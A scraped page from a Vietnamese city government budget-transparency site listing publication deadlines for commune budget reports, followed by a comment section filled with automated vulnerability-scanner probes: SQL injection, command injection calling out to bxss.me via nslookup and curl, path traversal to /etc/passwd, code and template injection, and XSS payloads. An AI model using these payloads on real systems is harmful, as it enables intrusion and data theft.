UBND TỈNH QUẢNG BÌNH
UBND THÀNH PHỐ ĐỒNG HỚI
TRANG CÔNG KHAI NGÂN SÁCH UBND THÀNH PHỐ ĐỒNG HỚI
Thứ tư, 17/07/2024 18:04:48
Dương Trung Đức

Thời điểm công khai báo cáo

1. Báo cáo dự toán ngân sách xã và kế hoạch thu, chi các hoạt động tài chính khác ở xã trình Hội đồng nhân dân cấp xã phải được công khai chậm nhất là 05 ngày làm việc kể từ ngày Ủy ban nhân dân cấp xã gửi đại biểu Hội đồng nhân dân cấp xã.

2. Báo cáo dự toán ngân sách xã và kế hoạch thu, chi các hoạt động tài chính khác ở xã đã được Hội đồng nhân dân cấp xã quyết định, quyết toán ngân sách xã và kết quả thu, chi các hoạt động tài chính khác ở xã đã được Hội đồng nhân dân cấp xã phê chuẩn phải được công khai chậm nhất là 30 ngày, kể từ ngày văn bản được ban hành.

3. Báo cáo tình hình thực hiện ngân sách xã hằng quý, 06 tháng phải được công khai chậm nhất là 15 ngày, kể từ ngày kết thúc quý và 06 tháng.

4. Báo cáo tình hình thực hiện ngân sách xã hằng năm được công khai khi Ủy ban nhân dân cấp xã trình Hội đồng nhân dân cấp xã.

Stt Nội dung công bố Thời điểm công bố
1 Dự toán NSNN trình Hội đồng nhân dân 25/10
2 Dự toán NSNN đã được HĐND quyết định 15/12
3 Tình hình thực hiện NSNN quý I 15/4
4 Tình hình thực hiện NSNN 6 tháng 15/7
5 Tình hình thực hiện NSNN 9 tháng 15/10
6 Đánh giá tình hình thực hiện NSNN lần đầu 25/10
7 Đánh giá bổ sung kết quả thực hiện NSNN 10/6
8 Quyết toán NSNN đã được HĐND phê chuẩn 28/8

1889 Bình luận

image
sOdPqaAH
12/01/2024

1VLMGgeYO

image
1cEQxk0aO
12/01/2024

1

image
sOdPqaAH
12/01/2024

response.write(9387356*9047970)

image
sOdPqaAH
12/01/2024

'+response.write(9387356*9047970)+'

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

t3VO51Rc

image
sOdPqaAH
12/01/2024

echo yrmlxd$()\ ddltmb\nz^xyu||a #' &echo yrmlxd$()\ ddltmb\nz^xyu||a #|" &echo yrmlxd$()\ ddltmb\nz^xyu||a #

image
sOdPqaAH
12/01/2024

&echo mtzxku$()\ mlvoxg\nz^xyu||a #' &echo mtzxku$()\ mlvoxg\nz^xyu||a #|" &echo mtzxku$()\ mlvoxg\nz^xyu||a #

image
sOdPqaAH
12/01/2024

-1 OR 2+828-828-1=0+0+0+1

image
sOdPqaAH
12/01/2024

../../../../../../../../../../../../../../etc/passwd

image
sOdPqaAH
12/01/2024

-1' OR 2+961-961-1=0+0+0+1 --

image
sOdPqaAH
12/01/2024

1&echo pdknvk$()\ smvasp\nz^xyu||a #' &echo pdknvk$()\ smvasp\nz^xyu||a #|" &echo pdknvk$()\ smvasp\nz^xyu||a #

image
sOdPqaAH
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
sOdPqaAH
12/01/2024

-1' OR 2+793-793-1=0+0+0+1 or 'NhiqZxY4'='

image
sOdPqaAH
12/01/2024

1|echo nqfxuo$()\ hjymvn\nz^xyu||a #' |echo nqfxuo$()\ hjymvn\nz^xyu||a #|" |echo nqfxuo$()\ hjymvn\nz^xyu||a #

image
sOdPqaAH
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
sOdPqaAH
12/01/2024

../1

image
sOdPqaAH
12/01/2024

$(nslookup -q=cname hitefriorqwnn0c448.bxss.me||curl hitefriorqwnn0c448.bxss.me)

image
sOdPqaAH
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
sOdPqaAH
12/01/2024

&nslookup -q=cname hitkkepnppyfbc5e05.bxss.me&'\"`0&nslookup -q=cname hitkkepnppyfbc5e05.bxss.me&`'

image
sOdPqaAH
12/01/2024

;(nslookup -q=cname hitxkfhzfbslc91901.bxss.me||curl hitxkfhzfbslc91901.bxss.me)|(nslookup -q=cname hitxkfhzfbslc91901.bxss.me||curl hitxkfhzfbslc91901.bxss.me)&(nslookup -q=cname hitxkfhzfbslc91901.bxss.me||curl hitxkfhzfbslc91901.bxss.me)

image
echo iwjdew$()\ wwoslb\nz^xyu||a #' &echo iwjdew$()\ wwoslb\nz^xyu||a #|" &echo iwjdew$()\ wwoslb\nz^xyu||a #
12/01/2024

1

image
sOdPqaAH
12/01/2024

PhfxaCUl'; waitfor delay '0:0:15' --

image
sOdPqaAH&echo gjypql$()\ mdmlvy\nz^xyu||a #' &echo gjypql$()\ mdmlvy\nz^xyu||a #|" &echo gjypql$()\ mdmlvy\nz^xyu||a #
12/01/2024

1

image
sOdPqaAH<esi:include src="http://bxss.me/rpb.png"/>
12/01/2024

1

image
sOdPqaAH
12/01/2024

1hREEL00'); waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

-5 OR 810=(SELECT 810 FROM PG_SLEEP(15))--

image
&nslookup -q=cname hitwykfttivgbe16fd.bxss.me&'\"`0&nslookup -q=cname hitwykfttivgbe16fd.bxss.me&`'
12/01/2024

1

image
${10000272+10000143}
12/01/2024

1

image
`(nslookup -q=cname hitawrebcbcqqc3f72.bxss.me||curl hitawrebcbcqqc3f72.bxss.me)`
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
;(nslookup -q=cname hitxmanpyxlyac0a43.bxss.me||curl hitxmanpyxlyac0a43.bxss.me)|(nslookup -q=cname hitxmanpyxlyac0a43.bxss.me||curl hitxmanpyxlyac0a43.bxss.me)&(nslookup -q=cname hitxmanpyxlyac0a43.bxss.me||curl hitxmanpyxlyac0a43.bxss.me)
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'"

image
sOdPqaAH
12/01/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
sOdPqaAH
12/01/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
sOdPqaAH
12/01/2024

Http://bxss.me/t/fit.txt

image
sOdPqaAH
12/01/2024

@@EEO5A

image
sOdPqaAH
12/01/2024

http://bxss.me/t/fit.txt?.jpg

image
sOdPqaAH
12/01/2024

/etc/shells

image
sOdPqaAH
12/01/2024

c:/windows/win.ini

image
AEYwjuVt
12/01/2024

1

image
-1 OR 2+854-854-1=0+0+0+1 --
12/01/2024

1

image
sOdPqaAH
12/01/2024

)

image
sOdPqaAH
12/01/2024

bxss.me

image
sOdPqaAH
12/01/2024

!(()&&!|*|*|

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
12/01/2024

1

image
sOdPqaAH
12/01/2024

^(#$!@#$)(()))******

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
12/01/2024

1

image
-1' OR 2+19-19-1=0+0+0+1 --
12/01/2024

1

image
)
12/01/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
1 waitfor delay '0:0:15' --
12/01/2024

1

image
45rKkAJ8'; waitfor delay '0:0:15' --
12/01/2024

1

image
669OWSJO'); waitfor delay '0:0:15' --
12/01/2024

1

image
TErjKbrB' OR 173=(SELECT 173 FROM PG_SLEEP(15))--
12/01/2024

1

image
sOdPqaAH
12/01/2024

'.gethostbyname(lc('hitoy'.'gspjwfzbe49f9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(66).chr(99).chr(67).'

image
OtVJfxkg') OR 536=(SELECT 536 FROM PG_SLEEP(15))--
12/01/2024

1

image
sOdPqaAH
12/01/2024

".gethostbyname(lc("hithr"."bhgqhrze03cdf.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(90).chr(109).chr(83)."

image
'.gethostbyname(lc('hitus'.'zcvevkeebaa49.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(74).chr(117).chr(78).'
12/01/2024

1

image
sOdPqaAH'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
12/01/2024

1

image
1'"
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1 bcc:0.710-6635.710.c082f.19734.2@bxss.me

image
sOdPqaAH
12/01/2024

to@example.com> bcc:0.710-6636.710.c082f.19734.2@bxss.me

image
sOdPqaAH
12/01/2024

';print(md5(31337));$a='

image
sOdPqaAH bcc:0.710-6637.710.c082f.19734.2@bxss.me
12/01/2024

1

image
sOdPqaAH
12/01/2024

";print(md5(31337));$a="

image
to@example.com> bcc:0.710-6638.710.c082f.19734.2@bxss.me
12/01/2024

1

image
sOdPqaAH
12/01/2024

${@print(md5(31337))}

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

'.print(md5(31337)).'

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
12/01/2024

1

image
';print(md5(31337));$a='
12/01/2024

1

image
sOdPqaAH
12/01/2024

1"&&sleep(27*1000)*hbsesh&&"

image
bxss.me/t/xss.html?%00
12/01/2024

1

image
";print(md5(31337));$a="
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'||sleep(27*1000)*mnwvru||'

image
${@print(md5(31337))}
12/01/2024

1

image
sOdPqaAH
12/01/2024

1"||sleep(27*1000)*tdzxfo||"

image
${@print(md5(31337))}\
12/01/2024

1

image
'.print(md5(31337)).'
12/01/2024

1

image
sOdPqaAH
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(99).concat(81).concat(118).concat(84)+(require"socket" Socket.gethostbyname("hitrb"+"lvmicsjr7e380.bxss.me.")[3].to_s)+"

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

comment

image
sOdPqaAH
12/01/2024

comment/.

image
sOdPqaAH"||sleep(27*1000)*epwsrz||"
12/01/2024

1

image
comment/.
12/01/2024

1

image
sOdPqaAH
12/01/2024

xfs.bxss.me

image
sOdPqaAH
12/01/2024

1

image
xfs.bxss.me
12/01/2024

1

image
sOdPqaAH
12/01/2024

'"

image
sOdPqaAH
12/01/2024

19432892

image
sOdPqaAH
12/01/2024

bfg1495<s1﹥s2ʺs3ʹhjl1495

image
sOdPqaAH
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

"}}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

"%}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

"}dfb#{98991*97996}xca

image
sOdPqaAH
12/01/2024

"}dfb{@98991*97996}xca

image
sOdPqaAH
12/01/2024

"}}dfb{{=98991*97996}}xca

image
sOdPqaAH
12/01/2024

"%>dfb<%=98991*97996%>xca

image
sOdPqaAH
12/01/2024

"}dfb#set($x=98991*97996)${x}xca

image
sOdPqaAH
12/01/2024

"}dfb{{"abc"|title}}xca

image
sOdPqaAH
12/01/2024

"print("dfb" . 98991*97996 . "xca");

image
sOdPqaAH
12/01/2024

"98991*97996*98991*97996

image
sOdPqaAH
12/01/2024

"dfb__${98991*97996}__::.x

image
sOdPqaAH
12/01/2024

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
sOdPqaAH
12/01/2024

'%}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

')dfb@(98991*97996)xca

image
sOdPqaAH
12/01/2024

'%>dfb<%=98991*97996%>xca

image
sOdPqaAH
12/01/2024

'print("dfb" . 98991*97996 . "xca");

image
sOdPqaAH
12/01/2024

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

image
sOdPqaAH
12/01/2024

'}#{98991*97996*98991*97996}

image
sOdPqaAH
12/01/2024

'}}dfb{{'abcd'.toUpperCase()}}xca

image
sOdPqaAH
12/01/2024

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

image
sOdPqaAH
12/01/2024

'}}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

1}}dfb{{98991*97996}}xca

image
HfjNUlYZ
12/01/2024

'+response.write(9338672*9736336)+'

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
HfjNUlYZ
12/01/2024

-1 OR 2+280-280-1=0+0+0+1 --

image
HfjNUlYZ
12/01/2024

-1' OR 2+52-52-1=0+0+0+1 --

image
../../../../../../../../../../../../../../etc/passwd
12/01/2024

1

image
HfjNUlYZ
12/01/2024

-1' OR 3*2<(0+5+821-821) or 'VGxd1IR5'='

image
HfjNUlYZ
12/01/2024

(nslookup -q=cname hitpsiacfdnema4727.bxss.me||curl hitpsiacfdnema4727.bxss.me))

image
../../../../../../../../../../../../../../windows/win.ini
12/01/2024

1

image
HfjNUlYZ
12/01/2024

$(nslookup -q=cname hitjpuwzightf11da0.bxss.me||curl hitjpuwzightf11da0.bxss.me)

image
HfjNUlYZ
12/01/2024

-1' OR 3*2>(0+5+821-821) or 'VGxd1IR5'='

image
file:///etc/passwd
12/01/2024

1

image
HfjNUlYZ
12/01/2024

&nslookup -q=cname hitbghuvrgxyc74300.bxss.me&'\"`0&nslookup -q=cname hitbghuvrgxyc74300.bxss.me&`'

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

&(nslookup -q=cname hitlhipolajoxe8642.bxss.me||curl hitlhipolajoxe8642.bxss.me)&'\"`0&(nslookup -q=cname hitlhipolajoxe8642.bxss.me||curl hitlhipolajoxe8642.bxss.me)&`'

image
HfjNUlYZ
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
HfjNUlYZ
12/01/2024

`(nslookup -q=cname hitetcfxfmseo6a0fa.bxss.me||curl hitetcfxfmseo6a0fa.bxss.me)`

image
HfjNUlYZ
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
HfjNUlYZ
12/01/2024

yMkhUOgn')); waitfor delay '0:0:15' --

image
&nslookup -q=cname hitsjphdaiaxe18033.bxss.me&'\"`0&nslookup -q=cname hitsjphdaiaxe18033.bxss.me&`'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

-5) OR 786=(SELECT 786 FROM PG_SLEEP(15))--

image
&(nslookup -q=cname hituetubfbguab4304.bxss.me||curl hituetubfbguab4304.bxss.me)&'\"`0&(nslookup -q=cname hituetubfbguab4304.bxss.me||curl hituetubfbguab4304.bxss.me)&`'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

Z4pn2EWP')) OR 206=(SELECT 206 FROM PG_SLEEP(15))--

image
HfjNUlYZ
12/01/2024

1

image
oZL2Tgib
12/01/2024

1

image
HfjNUlYZ
12/01/2024

${10000446+9999176}

image
-1' OR 2+142-142-1=0+0+0+1 or 'nlNxoIt5'='
12/01/2024

1

image
-1" OR 2+630-630-1=0+0+0+1 --
12/01/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
12/01/2024

1

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
12/01/2024

1

image
Q6ZfhF7n'; waitfor delay '0:0:15' --
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

Http://bxss.me/t/fit.txt

image
)
12/01/2024

1

image
X2pq5Kia')); waitfor delay '0:0:15' --
12/01/2024

1

image
nBH7108D') OR 504=(SELECT 504 FROM PG_SLEEP(15))--
12/01/2024

1

image
HfjNUlYZ
12/01/2024

c:/windows/win.ini

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
12/01/2024

1

image
1'"
12/01/2024

1

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()

image
'.gethostbyname(lc('hitpr'.'nbveviih4dc4b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(66).chr(100).chr(67).'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1"&&sleep(27*1000)*jqwlye&&"

image
HfjNUlYZ
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
HfjNUlYZ"&&sleep(27*1000)*arxoqz&&"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1 bcc:0.700-6281.700.5513a.19734.2@bxss.me

image
${@print(md5(31337))}
12/01/2024

1

image
${@print(md5(31337))}\
12/01/2024

1

image
"+"A".concat(70-3).concat(22*4).concat(111).concat(69).concat(106).concat(70)+(require"socket" Socket.gethostbyname("hitxm"+"fjyxznao82b53.bxss.me.")[3].to_s)+"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

comment

image
HfjNUlYZ
12/01/2024

comment/.

image
HfjNUlYZ
12/01/2024

xfs.bxss.me

image
xfs.bxss.me
12/01/2024

1

image
comment
12/01/2024

1

image
'"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

%31%39%39%33%37%22%28%29%3B%7D%5D%39%34%36%37

image
HfjNUlYZ
12/01/2024

1</script><script>HfDs(9150)</script>

image
HfjNUlYZ9643635
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1DZ7SfQnCNO

image
UjF4RVNpU3k=
12/01/2024

1

image
sOdPqaAH
12/01/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
sOdPqaAH
12/01/2024

response.write(9319522*9382840)

image
sOdPqaAH
12/01/2024

'+response.write(9319522*9382840)+'

image
sOdPqaAH
12/01/2024

../../../../../../../../../../../../../../etc/passwd

image
sOdPqaAH
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
sOdPqaAH
12/01/2024

file:///etc/passwd

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

|echo xshhnd$()\ qzbsim\nz^xyu||a #' |echo xshhnd$()\ qzbsim\nz^xyu||a #|" |echo xshhnd$()\ qzbsim\nz^xyu||a #

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
sOdPqaAH
12/01/2024

Http://bxss.me/t/fit.txt

image
sOdPqaAH
12/01/2024

^(#$!@#$)(()))******

image
sOdPqaAH
12/01/2024

http://bxss.me/t/fit.txt?.jpg

image
sOdPqaAH
12/01/2024

/etc/shells

image
sOdPqaAH
12/01/2024

c:/windows/win.ini

image
sOdPqaAH
12/01/2024

&(nslookup -q=cname hituzxyzedhfz0f1c2.bxss.me||curl hituzxyzedhfz0f1c2.bxss.me)&'\"`0&(nslookup -q=cname hituzxyzedhfz0f1c2.bxss.me||curl hituzxyzedhfz0f1c2.bxss.me)&`'

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
12/01/2024

1

image
sOdPqaAH
12/01/2024

'.gethostbyname(lc('hitaq'.'lxrsglym69294.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(82).chr(101).chr(87).'

image
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
12/01/2024

1

image
".gethostbyname(lc("hitno"."qbtjvrvb06d99.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(70).chr(101).chr(66)."
12/01/2024

1

image
sOdPqaAH&echo nmzmbt$()\ gnklrc\nz^xyu||a #' &echo nmzmbt$()\ gnklrc\nz^xyu||a #|" &echo nmzmbt$()\ gnklrc\nz^xyu||a #
12/01/2024

1

image
sOdPqaAH
12/01/2024

cQC5Wv7U

image
|echo ntzhfo$()\ tmnubx\nz^xyu||a #' |echo ntzhfo$()\ tmnubx\nz^xyu||a #|" |echo ntzhfo$()\ tmnubx\nz^xyu||a #
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1 OR 2+488-488-1=0+0+0+1 --

image
c:/windows/win.ini
12/01/2024

1

image
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1 OR 2+757-757-1=0+0+0+1

image
bxss.me
12/01/2024

1

image
/../..//../..//../..//../..//../..//etc/passwd.jpg
12/01/2024

1

image
/etc/passwd
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1' OR 3*2<(0+5+320-320) --

image
%2fetc%2fpasswd
12/01/2024

1

image
sOdPqaAH
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
sOdPqaAH
12/01/2024

-1' OR 2+492-492-1=0+0+0+1 or '5l0xRHnM'='

image
sOdPqaAH
12/01/2024

';print(md5(31337));$a='

image
/.././.././.././.././.././.././.././../etc/./passwd%00
12/01/2024

1

image
$(nslookup -q=cname hitzpsogyiufc6f924.bxss.me||curl hitzpsogyiufc6f924.bxss.me)
12/01/2024

1

image
sOdPqaAH
12/01/2024

";print(md5(31337));$a="

image
sOdPqaAH
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
sOdPqaAH
12/01/2024

1"||sleep(27*1000)*irijoc||"

image
sOdPqaAH
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
sOdPqaAH
12/01/2024

${@print(md5(31337))}\

image
&(nslookup -q=cname hituinnvmdctl34887.bxss.me||curl hituinnvmdctl34887.bxss.me)&'\"`0&(nslookup -q=cname hituinnvmdctl34887.bxss.me||curl hituinnvmdctl34887.bxss.me)&`'
12/01/2024

1

image
sOdPqaAH
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
sOdPqaAH
12/01/2024

'.print(md5(31337)).'

image
../././../././../././../././../././../././../././../././../././../././etc/passwd
12/01/2024

1

image
sOdPqaAH
12/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
;(nslookup -q=cname hitzktbsqrowg9080a.bxss.me||curl hitzktbsqrowg9080a.bxss.me)|(nslookup -q=cname hitzktbsqrowg9080a.bxss.me||curl hitzktbsqrowg9080a.bxss.me)&(nslookup -q=cname hitzktbsqrowg9080a.bxss.me||curl hitzktbsqrowg9080a.bxss.me)
12/01/2024

1

image
';print(md5(31337));$a='
12/01/2024

1

image
";print(md5(31337));$a="
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1)); waitfor delay '0:0:15' --

image
sOdPqaAH bcc:0.710-25096.710.63e64.19734.2@bxss.me
12/01/2024

1

image
${@print(md5(31337))}
12/01/2024

1

image
to@example.com> bcc:0.710-25097.710.63e64.19734.2@bxss.me
12/01/2024

1

image
${@print(md5(31337))}\
12/01/2024

1

image
sOdPqaAH'&&sleep(27*1000)*ydeifs&&'
12/01/2024

1

image
sOdPqaAH
12/01/2024

r9QhFuMB'; waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

Wotr3jFb'); waitfor delay '0:0:15' --

image
sOdPqaAH'||sleep(27*1000)*wigkkc||'
12/01/2024

1

image
sOdPqaAH
12/01/2024

PSl67653')); waitfor delay '0:0:15' --

image
file:///etc/passwd
12/01/2024

1

image
sOdPqaAH"||sleep(27*1000)*leyyxn||"
12/01/2024

1

image
/\../\../\../\../\../\../\../etc/passwd
12/01/2024

1

image
sOdPqaAH
12/01/2024

-5 OR 144=(SELECT 144 FROM PG_SLEEP(15))--

image
..\..\..\..\..\..\..\..\windows\win.ini
12/01/2024

1

image
sOdPqaAH
12/01/2024

1gQla7cn')) OR 935=(SELECT 935 FROM PG_SLEEP(15))--

image
sOdPqaAH
12/01/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
12/01/2024

1

image
sOdPqaAH
12/01/2024

comment

image
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
12/01/2024

1

image
xfs.bxss.me
12/01/2024

1

image
sOdPqaAH
12/01/2024

comment

image
sOdPqaAH
12/01/2024

comment/.

image
WEB-INF/web.xml
12/01/2024

1

image
sOdPqaAH
12/01/2024

'"

image
comment
12/01/2024

1

image
sOdPqaAH
12/01/2024

@@Owjsy

image
WEB-INF\web.xml
12/01/2024

1

image
comment/.
12/01/2024

1

image
'"
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
<!--
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'"()&%<zzz><ScRiPt >msqs(9718)</ScRiPt>

image
MfVVtnAS
12/01/2024

1

image
-1 OR 2+972-972-1=0+0+0+1 --
12/01/2024

1

image
-1 OR 2+360-360-1=0+0+0+1
12/01/2024

1

image
-1' OR 2+981-981-1=0+0+0+1 or 'w2KNFzg4'='
12/01/2024

1

image
sOdPqaAH'"()&%<zzz><ScRiPt >msqs(9278)</ScRiPt>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >msqs(9527)</ScRiPt>
12/01/2024

1

image
sOdPqaAH9738507
12/01/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
12/01/2024

1

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
12/01/2024

1

image
xIudea9V'; waitfor delay '0:0:15' --
12/01/2024

1

image
gI5EDgPi'); waitfor delay '0:0:15' --
12/01/2024

1

image
a1dsZR72')); waitfor delay '0:0:15' --
12/01/2024

1

image
aDuch1Xr')) OR 17=(SELECT 17 FROM PG_SLEEP(15))--
12/01/2024

1

image
bfg4652<s1﹥s2ʺs3ʹhjl4652
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
"%}dfb{{98991*97996}}xca
12/01/2024

1

image
"}dfb{#98991*97996}xca
12/01/2024

1

image
"}dfb{@98991*97996}xca
12/01/2024

1

image
")dfb@(98991*97996)xca
12/01/2024

1

image
"98991*97996*98991*97996
12/01/2024

1

image
"}}}dfb{{{this}}}xca
12/01/2024

1

image
"}}dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
'}dfb${98991*97996}xca
12/01/2024

1

image
'}dfb{@98991*97996}xca
12/01/2024

1

image
')dfb@(98991*97996)xca
12/01/2024

1

image
'%>dfb<%=98991*97996%>xca
12/01/2024

1

image
'}dfb#set($x=98991*97996)${x}xca
12/01/2024

1

image
'}dfb{{"abc"|title}}xca
12/01/2024

1

image
'}}dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
'}}dfb{{98991*97996}}xca
12/01/2024

1

image
'dfb__${98991*97996}__::.x
12/01/2024

1

image
1}}dfb{{98991*97996}}xca
12/01/2024

1

image
1}dfb#{98991*97996}xca
12/01/2024

1

image
1}dfb{@98991*97996}xca
12/01/2024

1

image
1print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
198991*97996*98991*97996
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1BryGYkhM6O

image
sOdPqaAH
12/01/2024

1

image
1CNr9vhbdaO
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
TlJnRU9Odlc=
12/01/2024

1

image
sOdPqaAH
12/01/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
12/01/2024

1

image
sOdPqaAH
12/01/2024

19809883

image
sOdPqaAH
12/01/2024

response.write(9511259*9645320)

image
sOdPqaAH
12/01/2024

'+response.write(9511259*9645320)+'

image
sOdPqaAH
12/01/2024

"+response.write(9511259*9645320)+"

image
response.write(9650113*9296999)
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
'+response.write(9650113*9296999)+'
12/01/2024

1

image
sOdPqaAH
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
sOdPqaAH
12/01/2024

echo cxyahj$()\ vpqlve\nz^xyu||a #' &echo cxyahj$()\ vpqlve\nz^xyu||a #|" &echo cxyahj$()\ vpqlve\nz^xyu||a #

image
sOdPqaAH
12/01/2024

file:///etc/passwd

image
sOdPqaAH
12/01/2024

&echo zohzgj$()\ xbftgv\nz^xyu||a #' &echo zohzgj$()\ xbftgv\nz^xyu||a #|" &echo zohzgj$()\ xbftgv\nz^xyu||a #

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

1&echo uwsepf$()\ jusizy\nz^xyu||a #' &echo uwsepf$()\ jusizy\nz^xyu||a #|" &echo uwsepf$()\ jusizy\nz^xyu||a #

image
sOdPqaAH
12/01/2024

../1

image
sOdPqaAH
12/01/2024

1|echo tihpui$()\ pektua\nz^xyu||a #' |echo tihpui$()\ pektua\nz^xyu||a #|" |echo tihpui$()\ pektua\nz^xyu||a #

image
../../../../../../../../../../../../../../windows/win.ini
12/01/2024

1

image
file:///etc/passwd
12/01/2024

1

image
